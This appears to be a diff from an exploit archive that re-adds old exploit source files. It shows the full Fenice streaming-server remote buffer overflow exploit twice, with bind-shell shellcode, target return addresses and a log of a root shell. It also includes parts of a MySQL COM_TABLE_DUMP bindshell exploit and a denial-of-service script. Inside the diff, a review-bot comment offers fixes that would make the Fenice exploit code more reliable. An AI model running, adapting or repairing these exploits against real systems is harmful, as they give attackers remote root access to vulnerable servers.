sure in 2.4.* by default. - the offset on 2.6.13.2 and 2.6.15.6 compiled with amd64 flag - (slackware 10.2), also on 2.6.15.4 compiled with i386 flag - (Fedora core 2) was same. on default installation of fc3 the - linux-gate.so.1 has null at the first , so think of another - way to jump to the shellcode. 
- - ************************************************************** - - greeting to : - - www.ihsteam.com the team , LorD and NT - www.ihsteam.net english version , - www.c0d3r.org my home :) - www.underground.ir friends who are participating in the forums - www.exploitdev.com Jamie and Ben , those times are now legend - www.milw0rm.com str0ke , keep the good job going - -/* -/* - -[c0d3r]$ gcc fenice.c -o fenice -[c0d3r]$ ./fenice 127.0.0.1 554 0 - --------- fenice - Open Media Streaming Project remote BOF exploit --------- copyrighted by c0d3r of IHS 2006 - -[+] Targeting slackware 10.2 -[+] Shellcode size : 329 bytes -[+] Building overflow string -[+] attacking host 127.0.0.1 -[+] packet size = 750 byte -[+] connected -[+] sending the overflow string -[+] exploit sent successfully to 127.0.0.1 -[+] trying to get shell -[+] connecting to 127.0.0.1 on port 4444 -[+] target exploited successfully -[+] Dropping into shell - -uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy) -Linux c0d3r 2.6.15.6 #4 SMP PREEMPT Sat Apr 15 23:22:34 AKDT 2006 i686 unknown unknown GNU/Linux - - -*/ - - - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#define inc 0x41 -#define size 750 - - -void gotshell(int new_sock); -void usage(); - -// metasploit.com shellcode - badchars = 0x00 0x05 -// linux_ia32_bind - LPORT=4444 Size=329 Encoder=PexAlphaNum -// I had a bit difficulty to execute my shellcode because some chars -// badly interpreted by fenice , anyway viva metasploit ! 
- -unsigned char shellcode[] = - -"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" -"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff" -"\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56" -"\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58" -"\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44" -"\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d" -"\x41\x43\x4b\x4d\x43\x45\x43\x54\x43\x45\x4c\x56\x44\x50\x4c\x36" -"\x48\x36\x4a\x55\x49\x49\x49\x58\x41\x4e\x4d\x4c\x42\x58\x48\x49" -"\x43\x54\x44\x45\x48\x36\x4a\x46\x41\x41\x4e\x35\x48\x36\x43\x35" -"\x49\x38\x41\x4e\x4c\x46\x48\x46\x4a\x35\x42\x35\x41\x35\x48\x45" -"\x49\x48\x41\x4e\x4d\x4c\x42\x48\x42\x4b\x48\x36\x41\x4d\x43\x4e" -"\x4d\x4c\x42\x58\x44\x45\x44\x55\x48\x45\x43\x54\x49\x38\x41\x4e" -"\x42\x4b\x48\x46\x4d\x4c\x42\x58\x43\x59\x4c\x56\x44\x30\x49\x55" -"\x42\x4b\x4f\x33\x4d\x4c\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b" -"\x4b\x30\x44\x55\x4a\x46\x4f\x52\x4f\x32\x43\x47\x4a\x46\x4a\x56" -"\x4f\x42\x44\x56\x49\x36\x50\x36\x49\x48\x43\x4e\x44\x55\x43\x55" -"\x49\x58\x41\x4e\x4d\x4c\x42\x48\x5a"; - -char slack [] = "\x77\xe7\xff\xff"; // slackware 10.2 2.6.15.6 -char FC2_2_6_15[] = "\x77\xe7\xff\xff"; // Fedora core 2 , 2.6.15.4 -char debug [] = "\xdd\xdd\xdd\xdd"; // debugging purpose -char ret[4]; -char get [] = "\x47\x45\x54\x20\x2f"; -struct hostent *hp; -struct sockaddr_in con; -unsigned int rc,rc2,len=16,sock,sock2,os,addr,port; -char buffer[size]; - -// gotshell is from jamie (darkdud3) remote exploit sample -// with a bit change - -void gotshell(int sock){ - - fd_set fd_read; - char buff[1024]; - char cmd[100] = "id;uname -a\n"; - int n; - - 
FD_ZERO(&fd_read); - FD_SET(sock, &fd_read); - FD_SET(0, &fd_read); - send(sock, cmd, strlen(cmd), 0); - while(1) { - FD_SET(sock,&fd_read); - FD_SET(0,&fd_read); - if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break; - if( FD_ISSET(sock, &fd_read) ) { - if((n=recv(sock,buff,sizeof(buff),0))<0){ - fprintf(stderr, "EOF\n"); - exit(2); - } - if(write(1,buff,n)<0)break; - } - if ( FD_ISSET(0, &fd_read) ) { - if((n=read(0,buff,sizeof(buff)))<0){ - fprintf(stderr,"EOF\n"); - exit(2); - } - if(send(sock,buff,n,0)<0) break; - } - usleep(10); - } - fprintf(stderr,"Connection aborted, select failed()\n"); - exit(0); -} - -void usage(char *arg){ - printf("-------- usage : %s host_or_ip port target\n",arg); - printf("-------- example : %s localhost 554 0\n",arg); - printf("-------- target 0 : slackware 10.2 linux-2.6.15.6 : 0\n"); - printf("-------- target 1 : Fedora core 2 linux-2.6.15.4 : 1\n"); - printf("-------- target 2 : debug : 2\n\n"); - exit(-1) ; -} - -int main(int argc,char **argv){ - - printf("\n-------- fenice - Open Media Streaming Project remote BOF exploit\n"); - printf("-------- copyrighted by c0d3r of IHS 2006\n\n"); - if(argc != 4) - usage(argv[0]); - os = (unsigned short)atoi(argv[3]); - switch(os){ - case 0: - strcat(ret,slack); - printf("[+] Targeting slackware 10.2\n"); - break; - case 1: - strcat(ret,FC2_2_6_15); - printf("[+] Targeting fedora core 2 \n"); - break; - case 2: - strcat(ret,debug); - printf("[+] Debugging\n"); - break; - default: - printf("\n[-] This target doesnt exist in the list\n\n"); - - exit(-1); - } - printf("[+] Shellcode size : %d bytes\n",sizeof(shellcode)-1); - printf("[+] Building overflow string\n"); - - // heart of exploit - - memset(buffer,inc,size); - memcpy(buffer,get,5); - memcpy(buffer+5+361,ret,4); - memcpy(buffer+5+361+4+10,shellcode,sizeof(shellcode)-1); - buffer[size] = 0; - - // EO heart of exploit - - hp = gethostbyname(argv[1]); - if (!hp) - addr = inet_addr(argv[1]); - if ((!hp) && (addr == INADDR_NONE) ){ - 
printf("[-] unable to resolve %s\n",argv[1]); - exit(-1); - } - sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); - if (!sock){ - printf("[-] socket() error...\n"); - exit(-1); - } - if (hp != NULL) - memcpy(&(con.sin_addr),hp->h_addr,hp->h_length); - else - con.sin_addr.s_addr = addr; - if (hp) - con.sin_family = hp->h_addrtype; - else - con.sin_family = AF_INET; - port=atoi(argv[2]); - con.sin_port=htons(port); - printf("[+] attacking host %s\n" , argv[1]) ; - sleep(1); - printf("[+] packet size = %d byte\n" , sizeof(buffer)); - rc=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in)); - if(!rc){ - sleep(1) ; - printf("[+] connected\n") ; - printf("[+] sending the overflow string\n") ; - send(sock,buffer,strlen(buffer),0); - send(sock,"\n",1,0); - sleep(1) ; - send(sock,"\n",1,0); - sleep(1) ; - printf("[+] exploit sent successfully to %s \n" , argv[1]); - printf("[+] trying to get shell\n"); - printf("[+] connecting to %s on port 4444\n",argv[1]); - sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); - if (!sock){ - printf("[-] socket() error...\n"); - exit(-1); - } - con.sin_family = AF_INET; - con.sin_port=htons(4444); - rc2=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in)); - if(rc2 != 0) { - printf("[-] exploit probably failed\n"); - exit(-1); - } - if(!rc2){ - printf("[+] target exploited successfully\n"); - printf("[+] Dropping into shell\n\n"); - gotshell(sock); - } - } -} - -// milw0rm.com [2006-04-25] +/* + IHS Iran Homeland Security public source code + Fenice - Open Media Streaming Server remote BOF exploit + author : c0d3r "kaveh razavi" c0d3r@ihsteam.com + package : fenice-1.10.tar.gz and prolly prior versions + workaround : update after patch release + advisory : http://www.securityfocus.com/bid/17678 + company address : http://streaming.polito.it/server + timeline : + 23 Apr 2006 : vulnerability reported by Luigi Auriemma + 25 Sep 2006 : IHS exploit released + exploit features : + 1) a global offset + 2) reliable metasploit 
shellcode + 3) autoconnect to shell + bad chars : 0x00 0x05 encoder : PexAlphaNum + compiled with gcc under Linux : gcc fenice.c -o fenice + + ************************************************************** + + Exploitation Method : linux-gate.so.1 + + the refrence written by izik could be downloaded from milw0rm. + after some research I realized that the offset is very stable + around 2.6 kernels compiled from source. the VA patch will + easily get bypassed. if you want to exploit 2.4 kernels + you can jump directly to the shellcode , there isn't any + stack randomization for sure in 2.4.* by default. + the offset on 2.6.13.2 and 2.6.15.6 compiled with amd64 flag + (slackware 10.2), also on 2.6.15.4 compiled with i386 flag + (Fedora core 2) was same. on default installation of fc3 the + linux-gate.so.1 has null at the first , so think of another + way to jump to the shellcode. + + ************************************************************** + + greeting to : + + www.ihsteam.com the team , LorD and NT + www.ihsteam.net english version , + www.c0d3r.org my home :) + www.underground.ir friends who are participating in the forums + www.exploitdev.com Jamie and Ben , those times are now legend + www.milw0rm.com str0ke , keep the good job going + +/* +/* + +[c0d3r]$ gcc fenice.c -o fenice +[c0d3r]$ ./fenice 127.0.0.1 554 0 + +-------- fenice - Open Media Streaming Project remote BOF exploit +-------- copyrighted by c0d3r of IHS 2006 + +[+] Targeting slackware 10.2 +[+] Shellcode size : 329 bytes +[+] Building overflow string +[+] attacking host 127.0.0.1 +[+] packet size = 750 byte +[+] connected +[+] sending the overflow string +[+] exploit sent successfully to 127.0.0.1 +[+] trying to get shell +[+] connecting to 127.0.0.1 on port 4444 +[+] target exploited successfully +[+] Dropping into shell + +uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy) +Linux c0d3r 2.6.15.6 #4 SMP PREEMPT Sat Apr 15 23:22:34 AKDT 2006 i686 
unknown unknown GNU/Linux + + +*/ + + + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#define inc 0x41 +#define size 750 + + +void gotshell(int new_sock); +void usage(); + +// metasploit.com shellcode - badchars = 0x00 0x05 +// linux_ia32_bind - LPORT=4444 Size=329 Encoder=PexAlphaNum +// I had a bit difficulty to execute my shellcode because some chars +// badly interpreted by fenice , anyway viva metasploit ! + +unsigned char shellcode[] = + +"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59" +"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff" +"\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56" +"\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58" +"\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44" +"\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d" +"\x41\x43\x4b\x4d\x43\x45\x43\x54\x43\x45\x4c\x56\x44\x50\x4c\x36" +"\x48\x36\x4a\x55\x49\x49\x49\x58\x41\x4e\x4d\x4c\x42\x58\x48\x49" +"\x43\x54\x44\x45\x48\x36\x4a\x46\x41\x41\x4e\x35\x48\x36\x43\x35" +"\x49\x38\x41\x4e\x4c\x46\x48\x46\x4a\x35\x42\x35\x41\x35\x48\x45" +"\x49\x48\x41\x4e\x4d\x4c\x42\x48\x42\x4b\x48\x36\x41\x4d\x43\x4e" +"\x4d\x4c\x42\x58\x44\x45\x44\x55\x48\x45\x43\x54\x49\x38\x41\x4e" +"\x42\x4b\x48\x46\x4d\x4c\x42\x58\x43\x59\x4c\x56\x44\x30\x49\x55" +"\x42\x4b\x4f\x33\x4d\x4c\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b" +"\x4b\x30\x44\x55\x4a\x46\x4f\x52\x4f\x32\x43\x47\x4a\x46\x4a\x56" +"\x4f\x42\x44\x56\x49\x36\x50\x36\x49\x48\x43\x4e\x44\x55\x43\x55" +"\x49\x58\x41\x4e\x4d\x4c\x42\x48\x5a"; + +char slack [] = "\x77\xe7\xff\xff"; // slackware 10.2 2.6.15.6 +char FC2_2_6_15[] = 
"\x77\xe7\xff\xff"; // Fedora core 2 , 2.6.15.4 +char debug [] = "\xdd\xdd\xdd\xdd"; // debugging purpose +char ret[4]; +char get [] = "\x47\x45\x54\x20\x2f"; +struct hostent *hp; +struct sockaddr_in con; +unsigned int rc,rc2,len=16,sock,sock2,os,addr,port; +char buffer[size]; + +// gotshell is from jamie (darkdud3) remote exploit sample +// with a bit change + +void gotshell(int sock){ + + fd_set fd_read; + char buff[1024]; + char cmd[100] = "id;uname -a\n"; + int n; + + FD_ZERO(&fd_read); + FD_SET(sock, &fd_read); + FD_SET(0, &fd_read); + send(sock, cmd, strlen(cmd), 0); + while(1) { + FD_SET(sock,&fd_read); + FD_SET(0,&fd_read); + if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break; + if( FD_ISSET(sock, &fd_read) ) { + if((n=recv(sock,buff,sizeof(buff),0))<0){ + fprintf(stderr, "EOF\n"); + exit(2); + } + if(write(1,buff,n)<0)break; + } + if ( FD_ISSET(0, &fd_read) ) { + if((n=read(0,buff,sizeof(buff)))<0){ + fprintf(stderr,"EOF\n"); + exit(2); + } + if(send(sock,buff,n,0)<0) break; + } + usleep(10); + } + fprintf(stderr,"Connection aborted, select failed()\n"); + exit(0); +} + +void usage(char *arg){ + printf("-------- usage : %s host_or_ip port target\n",arg); + printf("-------- example : %s localhost 554 0\n",arg); + printf("-------- target 0 : slackware 10.2 linux-2.6.15.6 : 0\n"); + printf("-------- target 1 : Fedora core 2 linux-2.6.15.4 : 1\n"); + printf("-------- target 2 : debug : 2\n\n"); + exit(-1) ; +} + +int main(int argc,char **argv){ + + printf("\n-------- fenice - Open Media Streaming Project remote BOF exploit\n"); + printf("-------- copyrighted by c0d3r of IHS 2006\n\n"); + if(argc != 4) + usage(argv[0]); + os = (unsigned short)atoi(argv[3]); + switch(os){ + case 0: + strcat(ret,slack); + printf("[+] Targeting slackware 10.2\n"); + break; + case 1: + strcat(ret,FC2_2_6_15); + printf("[+] Targeting fedora core 2 \n"); + break; + case 2: + strcat(ret,debug); + printf("[+] Debugging\n"); + break; + default: + printf("\n[-] This target doesnt exist 
in the list\n\n"); + + exit(-1); + } + printf("[+] Shellcode size : %d bytes\n",sizeof(shellcode)-1); + printf("[+] Building overflow string\n"); + + // heart of exploit + + memset(buffer,inc,size); + memcpy(buffer,get,5); + memcpy(buffer+5+361,ret,4); + memcpy(buffer+5+361+4+10,shellcode,sizeof(shellcode)-1); + buffer[size] = 0; + + // EO heart of exploit + + hp = gethostbyname(argv[1]); + if (!hp) + addr = inet_addr(argv[1]); + if ((!hp) && (addr == INADDR_NONE) ){ + printf("[-] unable to resolve %s\n",argv[1]); + exit(-1); + } + sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); + if (!sock){ + printf("[-] socket() error...\n"); + exit(-1); + } + if (hp != NULL) + memcpy(&(con.sin_addr),hp->h_addr,hp->h_length); + else + con.sin_addr.s_addr = addr; + if (hp) + con.sin_family = hp->h_addrtype; + else + con.sin_family = AF_INET; + port=atoi(argv[2]); + con.sin_port=htons(port); + printf("[+] attacking host %s\n" , argv[1]) ; + sleep(1); + printf("[+] packet size = %d byte\n" , sizeof(buffer)); + rc=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in)); + if(!rc){ + sleep(1) ; + printf("[+] connected\n") ; + printf("[+] sending the overflow string\n") ; + send(sock,buffer,strlen(buffer),0); + send(sock,"\n",1,0); + sleep(1) ; + send(sock,"\n",1,0); + sleep(1) ; + printf("[+] exploit sent successfully to %s \n" , argv[1]); + printf("[+] trying to get shell\n"); + printf("[+] connecting to %s on port 4444\n",argv[1]); + sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); + if (!sock){ + printf("[-] socket() error...\n"); + exit(-1); + } + con.sin_family = AF_INET; + con.sin_port=htons(4444); + rc2=connect(sock, (struct sockaddr *) &con, sizeof (struct sockaddr_in)); + if(rc2 != 0) { + printf("[-] exploit probably failed\n"); + exit(-1); + } + if(!rc2){ + printf("[+] target exploited successfully\n"); + printf("[+] Dropping into shell\n\n"); + gotshell(sock); + } + } +} + +// milw0rm.com [2006-04-25] 
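Review bot: `buffer[size] = 0;` writes one byte past `char buffer[size]` (index 750 of a 750-byte global array), and because no NUL ever lands inside the array the later `send(sock,buffer,strlen(buffer),0)` reads past it as well; declare `char buffer[size + 1];` so the terminator has a slot (the printed `sizeof(buffer)` then reports 751). `strcat(ret,slack)` has the same shape: `ret` is 4 bytes and strcat appends four address bytes plus a NUL, and it would also stop early on any address byte equal to 0x00 — use `memcpy(ret, slack, sizeof ret);` for all three targets. Both `if (!sock)` checks can never fire because `sock` is `unsigned int` and `socket()` signals failure with -1; declare it `int` and test `sock < 0`. In `gotshell`, `recv()` returning 0 (peer closed) is not treated as EOF, so the `select()` loop spins on a dead socket; the check should be `<= 0`. The hunk re-adds the file unchanged (line-ending normalization), so these are pre-existing defects on the new side rather than something this commit introduces.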
diff --git a/platforms/linux/remote/173.pl b/platforms/linux/remote/173.pl index 8562794b7..127ecc26e 100755 --- a/platforms/linux/remote/173.pl +++ b/platforms/linux/remote/173.pl @@ -55,6 +55,6 @@ print "sending string\n"; print $socket $buffer; close $socket; -print "\ndosed!\n"; - -# milw0rm.com [2004-04-09] +print "\ndosed!\n"; + +# milw0rm.com [2004-04-09] diff --git a/platforms/linux/remote/174.c b/platforms/linux/remote/174.c index af0e7c7d6..a3f3cf5bb 100755 --- a/platforms/linux/remote/174.c +++ b/platforms/linux/remote/174.c @@ -294,6 +294,6 @@ int main(int argc,char *argv[]) { } - - -// milw0rm.com [2004-04-12] + + +// milw0rm.com [2004-04-12] diff --git a/platforms/linux/remote/1741.c b/platforms/linux/remote/1741.c index 4a4dd2f09..2d111a6fc 100755 --- a/platforms/linux/remote/1741.c +++ b/platforms/linux/remote/1741.c 
@@ -1,401 +1,401 @@ -/* **************************************************************** - - April 21.st 2006 - - my_exploit.c - - MySql COM_TABLE_DUMP Memory Leak & MySql remote B0f - - MySql <= 5.0.20 - - MySql COM_TABLE_DUMP Memory Leak - - MySql <= 4.x.x - - copyright 2006 Stefano Di Paola (stefano.dipaola_at_wisec.it) - - GPL 2.0 - **************************************************************** - - Disclaimer: - - In no event shall the author be liable for any damages - whatsoever arising out of or in connection with the use - or spread of this information. - Any use of this information is at the user's own risk. - - **************************************************************** - - compile with: - gcc -Imysql-5.0.20-src/include/ my_com_table_dump_exploit.c -Lmysql-5.0.20/lib/mysql/ -lmysqlclient -o my_exploit - - Then: - - my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x] - - -H: this Help; - -i: Information leak exploit (shows the content of MySql Server Memory) - -x: shows c/s communication output in hexadecimal - -t: hexadecimal table_list struct address (by default we try to find it automatically) - -a: hexadecimal thread struct address (look at the error log to see something like: thd=0x8b1b338) - -u: mysql username (anonymous too ;) - -p: mysql userpass (if you need it) - -s: the socket path if is a unix socket - -h: hostname or IP address - -P: port (default 3306) - - - Example_1 - Memoryleak: my_exploit -s socketpath -u username -i - - Example_2 - Remote Shell: my_exploit -h 127.0.0.1 -u username -a 0x8b1f468 - - For memory leak: - - my_exploit -i [-u user] [-p password] [-s socket|[-h hostname [-P port]]] - - For the bindshell to port 2707 - my_exploit [-t 0xtableaddress] [-a 0xthdaddress] [-u user] [-p password] [-s socket|[-h hostname [-P port]]] - - then from another shell: - nc 127.0.0.1 2707 - id - uid=78(mysql) gid=78(mysql) groups=78(mysql) - - - -*/ - -#include -#include -#include - - - 
-// we need to know the thread struct address pointer and the table_list. -// these are defaults, change them from command line. -int thd = 0x8b1b338; -int tbl = 0x8b3a880; - -#define USOCK2 "/tmp/mysql.sock" - -char addr_tdh[4]; -char addr_tbl[4]; -char addr_ret[4]; - -// constants to overwrite packet with addresses for table_list thread and our shell. -#define TBL_POS 182 -#define THD_POS 178 -#define RET_POS 174 -#define SHL_POS 34 - -// bindshell spawns a shell with on port 2707 -char shcode[] = { - 0x6a, 0x66, 0x58, 0x6a, 0x01, 0x5b, 0x99, 0x52, 0x53, 0x6a, 0x02, 0x89 // 12 - ,0xe1, 0xcd, 0x80, 0x52, 0x43, 0x68, 0xff, 0x02, 0x0a, 0x93, 0x89, 0xe1 - ,0x6a, 0x10, 0x51, 0x50, 0x89, 0xe1, 0x89, 0xc6, 0xb0, 0x66, 0xcd, 0x80 - ,0x43, 0x43, 0xb0, 0x66, 0xcd, 0x80, 0x52, 0x56, 0x89, 0xe1, 0x43, 0xb0 - ,0x66, 0xcd, 0x80, 0x89, 0xd9, 0x89, 0xc3, 0xb0, 0x3f, 0x49, 0xcd, 0x80 - ,0x41, 0xe2, 0xf8, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f - ,0x62, 0x69, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80 // 12*7= 84 -}; - -int tmp_idx = 0; - -int dump_packet_len = 7; -char table_dump_packet[] = { 0x03, 0x00, 0x00, 0x00, 0x13, 0x02, 0x73 }; - -int payload_len = 371; -// header packet + select '1234567890...etc' -char query_payload[] = { - 0x6f, 0x01, 0x00, 0x00, 0x03, 0x73, 0x65, 0x6c, 0x65, 0x63, 0x74, 0x20, 0x27, 0x31, 0x32, 0x33 // 16 Some junk from position 6 ... 
- , 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x31, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36 // 32 - , 0x37, 0x38, 0x39, 0x30, 0x5f, 0x32, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39 // 48 - , 0x30, 0x5f, 0x33, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x34 // 64 - , 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x35, 0x5f, 0x31, 0x32 // 72 - , 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x36, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35 // 88 - , 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x37, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38 // 94 - , 0x39, 0x30, 0x5f, 0x38, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x6a // 112 - , 0x0b, 0x58, 0x99, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69, 0x89, 0xe3 // 128 endsh 118 - , 0x52, 0x53, 0x89, 0xe1, 0xcd, 0x80, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4c, 0x4d // 144 - , 0x4e, 0x4f, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x5a, 0x5f, 0x61, 0x61, 0x62, 0x62, 0x63 // 160 - , 0x63, 0x64, 0x64, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0x6c, 0xbf, 0x6d // 176 - , 0x6d, 0x6e, 0x6e, 0xff, 0x6f, 0x70, 0x70, 0x71, 0x71, 0x72, 0x72, 0x73, 0x73, 0x74, 0x74, 0x75 // 192 178 - , 0x75, 0x76, 0x76, 0x7a, 0x7a, 0x5f, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 208 - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 224 - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 240 - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 256 - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 272 - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // 288 - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 
0x3d, 0x3d, 0x3d // - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // - , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d // - , 0x3d, 0x3d, 0x27 -}; // 16*23+3 = 371 - - - - -static int s = 0, c = 0; -int fd = 0; -int d = 1; -int hexdump = 0; -char buf[65535]; - - -MYSQL *conn; /* pointer to connection handler */ - - -int -sendit (char *buf1, int fdest, int dblen) -{ - int len1; - int i = 0; - int ret = 0; - printf ("%d\n", d); - if (d == 2) - { - // let's prepare the query packet - int o; - int position = 14; - - tmp_idx = 3; - - - int ret = tbl - 0x106 + 33; - - for (i = 0; i < 32; i += 8) - addr_ret[tmp_idx--] = (ret >> i) & 0xff; - - tmp_idx = 3; - for (i = 0; i < 32; i += 8) - addr_tdh[tmp_idx--] = (thd >> i) & 0xff; - - tmp_idx = 3; - for (i = 0; i < 32; i += 8) - addr_tbl[tmp_idx--] = (tbl >> i) & 0xff; - printf ("ret %x\n", ret); - - -#if 1 - tmp_idx = 0; - for (o = THD_POS; o > THD_POS - 4; o--) - query_payload[o] = addr_tdh[tmp_idx++]; - - tmp_idx = 0; - for (o = TBL_POS; o > TBL_POS - 4; o--) - query_payload[o] = addr_tbl[tmp_idx++]; - - tmp_idx = 0; - for (o = RET_POS; o > RET_POS - 4; o--) - query_payload[o] = addr_ret[tmp_idx++]; -#else - for (; position < payload_len - 12; position += 12) - { - tmp_idx = 0; - printf ("p:%d\n", position); - for (o = position + 4; o > position; o--) - query_payload[o] = addr_ret[tmp_idx++]; - - tmp_idx = 0; - for (o = position + 8; o > position + 4; o--) - query_payload[o] = addr_tdh[tmp_idx++]; - - tmp_idx = 0; - for (o = position + 12; o > position + 8; o--) - query_payload[o] = addr_tbl[tmp_idx++]; - - } - -#endif - - tmp_idx = 0; - for (o = SHL_POS; o < SHL_POS + 84; o++) - query_payload[o] = shcode[tmp_idx++]; - - printf ("entro\n"); - buf1 = query_payload; - len1 = payload_len; - } - else if (d >= 3) - { - printf 
("entro\n"); - - // prepare table_dump request - PACK_LEN, 0x00, 0x00, 0x00, COM_TABLE_DUMP (0x13), DB_NAME_LEN (2) , RANDOM_CHAR (=0x73) - buf1 = table_dump_packet; - if (dblen >= 0) - buf1[5] = (char) dblen; - printf ("%x", (char) dblen); - len1 = dump_packet_len; - } - d++; - - printf ("\nClient -> Server\n"); - if (hexdump) - { - for (i = 0; i < len1; i++) - printf (" %.2x%c", (unsigned char) buf1[i], - ((i + 1) % 16 ? ' ' : '\n')); - printf ("\n"); - for (i = 0; i < len1; i++) - { - unsigned char f = (unsigned char) buf1[i]; - printf (" %.2c%2c", (isprint (f) ? f : '.'), - (((i + 1) % 16) ? ' ' : '\n')); - } - } - if (send (fd, buf1, len1, 0) != len1) - { - perror ("cli: send(buf3)"); - exit (1); - } - - - - fdest = fd; - - memset (buf, 0, 65535); - ret = recv (fdest, buf, 65535, 0); - printf ("\nServer -> Client\n"); - if (hexdump) - { - for (i = 0; i < ret; i++) - printf (" %.2x%c", (unsigned char) buf[i], - ((i + 1) % 16 ? ' ' : '\n')); - printf ("\n"); - for (i = 0; i < ret; i++) - { - unsigned char f = (unsigned char) buf[i]; - printf (" %.2c%2c", (isprint (f) ? f : '.'), - ((i + 1) % 16 ? 
